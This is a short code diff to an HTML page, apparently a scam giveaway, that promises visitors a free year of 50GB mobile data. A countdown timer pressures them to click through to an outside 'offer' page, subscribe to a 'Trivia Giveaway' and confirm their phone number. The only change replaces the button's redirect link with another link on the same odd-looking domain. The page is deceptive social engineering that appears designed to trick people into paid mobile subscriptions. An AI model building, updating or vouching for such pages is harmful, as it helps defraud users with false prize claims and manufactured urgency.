--- a/give.html
+++ b/give.html
@@ -779,7 +779,7 @@ input, textarea{
         <p class="congratulations">Congratulations, You're eligible for a year 50GB data bundle!</p>
         <p class="popup-text">🎉 Click the button below to visit this offer page, then click on subscribe button there to subscribe to Trivia Giveaway for 1 day, then click on the confirm button To  confirm your number and receive your 50GB data bundle for one year now to your number.</p>
         <p class="timer"> start now, Offer ends in <span id="countdown">150</span> seconds!</p>
-        <button class="redirect-button" onclick="window.location.href='https://societymagazinesunfaithful.com/zj8vdr2g9?key=4c98c0a46067f774210dd4afdcbff1c4';">Subscribe Now To Get Offer</button>
+        <button class="redirect-button" onclick="window.location.href='https://societymagazinesunfaithful.com/s48sq1p8q?key=ab4e65c07fe4e801206caab97399bd4d';">Subscribe Now To Get Offer</button>
     </div>
 
 </body>
